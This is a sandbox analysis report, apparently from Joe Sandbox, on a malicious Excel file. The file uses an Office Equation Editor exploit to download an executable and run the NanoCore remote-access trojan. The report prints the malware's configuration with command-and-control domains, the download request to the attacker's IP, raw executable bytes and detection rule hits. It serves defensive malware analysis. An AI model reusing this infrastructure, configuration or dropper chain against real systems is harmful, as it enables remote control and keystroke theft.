Loading ...

Play interactive tourEdit tour

Analysis Report Ref 0180066743.xlsx

Overview

General Information

Sample Name:Ref 0180066743.xlsx
Analysis ID:431726
MD5:dffc9e820070887fd0e4a4973e847a36
SHA1:32c5185f4aa508cc60ad331e4b3046dce732135c
SHA256:9d7b5114111ce6382d022e2e43344b2608db07ecbbf13da758dd220e8df90394
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1108 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1616 cmdline: 'C:\Users\Public\vbc.exe' MD5: EB43B3C033BD76B51B90A51A6726A81C)
      • RegAsm.exe (PID: 2164 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\vbc.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      C:\Users\user\AppData\Roaming\win33.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x13a8:$x1: NanoCore.ClientPluginHost
          00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
          • 0x13a8:$x2: NanoCore.ClientPluginHost
          • 0x1486:$s4: PipeCreated
          • 0x13c2:$s5: IClientLoggingHost
          00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x8955:$x1: NanoCore.ClientPluginHost
          • 0x8992:$x2: IClientNetworkHost
          • 0xc4c5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
          • 0x86bd:$a: NanoCore
          • 0x86cd:$a: NanoCore
          • 0x8901:$a: NanoCore
          • 0x8915:$a: NanoCore
          • 0x8955:$a: NanoCore
          • 0x871c:$b: ClientPlugin
          • 0x891e:$b: ClientPlugin
          • 0x895e:$b: ClientPlugin
          • 0x8843:$c: ProjectData
          • 0x924a:$d: DESCrypto
          • 0xadff:$i: get_Connected
          • 0x9580:$j: #=q
          • 0x95b0:$j: #=q
          • 0x95cc:$j: #=q
          • 0x95fc:$j: #=q
          • 0x9618:$j: #=q
          • 0x9634:$j: #=q
          • 0x9664:$j: #=q
          • 0x9680:$j: #=q
          • 0x96c4:$j: #=q
          • 0x96e0:$j: #=q
          00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x16e3:$x1: NanoCore.ClientPluginHost
          • 0x171c:$x2: IClientNetworkHost
          Click to see the 55 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.RegAsm.exe.c10000.11.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x5b99:$x1: NanoCore.ClientPluginHost
          • 0x5bb3:$x2: IClientNetworkHost
          5.2.RegAsm.exe.c10000.11.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
          • 0x5b99:$x2: NanoCore.ClientPluginHost
          • 0x6bce:$s4: PipeCreated
          • 0x5b86:$s5: IClientLoggingHost
          5.2.RegAsm.exe.cb0000.12.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x170b:$x1: NanoCore.ClientPluginHost
          • 0x1725:$x2: IClientNetworkHost
          5.2.RegAsm.exe.cb0000.12.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
          • 0x170b:$x2: NanoCore.ClientPluginHost
          • 0x34b6:$s4: PipeCreated
          • 0x16f8:$s5: IClientLoggingHost
          4.2.vbc.exe.3627c48.8.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x1018d:$x1: NanoCore.ClientPluginHost
          • 0x101ca:$x2: IClientNetworkHost
          • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          Click to see the 120 entries

          Sigma Overview

          AV Detection:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.127.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe

          E-Banking Fraud:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
          Sigma detected: Suspicious Process Start Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1616, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1616, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164

          Stealing of Sensitive Information:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

          Remote Access Functionality:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2164, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 4.2.vbc.exe.3486e00.5.raw.unpackMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
          Multi AV Scanner detection for domain / URLShow sources
          Source: wekeepworking.sytes.netVirustotal: Detection: 7%Perma Link
          Source: wekeepworking.sytes.netVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeVirustotal: Detection: 39%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeReversingLabs: Detection: 30%
          Source: C:\Users\user\AppData\Roaming\win33.exeReversingLabs: Detection: 30%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 30%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Ref 0180066743.xlsxReversingLabs: Detection: 21%
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\win33.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJoe Sandbox ML: detected
          Source: 5.2.RegAsm.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
          Source: 5.0.RegAsm.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 5.0.RegAsm.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 5.2.RegAsm.exe.de0000.14.unpackAvira: Label: TR/NanoCore.fadte

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: j,C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
          Source: Binary string: *:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000005.00000002.2367318598.0000000005404000.00000004.00000001.sdmp
          Source: Binary string: inC:\Windows\System.pdb *{ source: RegAsm.exe, 00000005.00000002.2367359268.000000000577C000.00000004.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: RegAsm.exe, RegAsm.exe.4.dr
          Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp
          Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp
          Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp
          Source: excel.exeMemory has grown: Private usage: 4MB later: 79MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 004309C0h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]
          Source: global trafficDNS query: name: wekeepworking.sytes.net
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.127.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.127.155:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: wekeepworking.sytes.net
          Source: Malware configuration extractorURLs: wekeepworking12.sytes.net
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 79.134.225.90:1144
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 06:04:57 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 08 Jun 2021 22:22:11 GMTETag: "b3400-5c44896d8ef42"Accept-Ranges: bytesContent-Length: 734208Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f ed bf 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 28 0a 00 00 0a 01 00 00 00 00 00 9e 47 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 47 0a 00 4b 00 00 00 00 60 0a 00 60 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 27 0a 00 00 20 00 00 00 28 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 07 01 00 00 60 0a 00 00 08 01 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 32 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 47 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 53 00 00 20 3b 00 00 03 00 00 00 0d 00 00 06 10 8f 00 00 32 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 be 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 7d 00 00 00 29 00 00 00 05 00 00 00 49 00 00 00 88 00 00 00 38 78 00 00 00 28 04 00 00 06 38 00 00 00 00 38 74 00 00 00 20 04 00 00 00 7e 87 00 00 04 39 c4 ff ff ff 26 38 ba ff ff ff 18 3a 34 00 00 00 20 00 00 00 00 7e 61 00 00 04 3a a9 ff ff ff 26 20 00 00 00 00 38 9e ff ff ff 38 2f 00 00 00 20 02 00 00 00 7e 7b 00 00 04 3a 8a ff ff ff 26 38 80 ff ff ff 28 03 00 00 06 20 03 00 00 00 7e 2a 00 00 04 39 70 ff ff ff 26 38 66 ff ff ff 1d 3a 82 ff ff ff 38 01 00 00 00 2a 38 fa ff ff ff 38 d0 ff ff ff 00 00 06 2a 00 00 1e 00 28 02 00 00 06 2a 1e 00 28 30 00 00 06 2a 26 7e 01 00 00 04 14 fe 01 2a 00 00 1a 7e 01 00 00 04 2a 00 13 30 04 00 74 00 00 00 01 00 00 11 02 28 01 00 00 0a 20 00 00 00 00 7e 21 00 00 04 3a 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 db ff ff ff fe 0c 0
          Source: Joe Sandbox ViewIP Address: 79.134.225.90 79.134.225.90
          Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: global trafficHTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.155Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
          Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.155
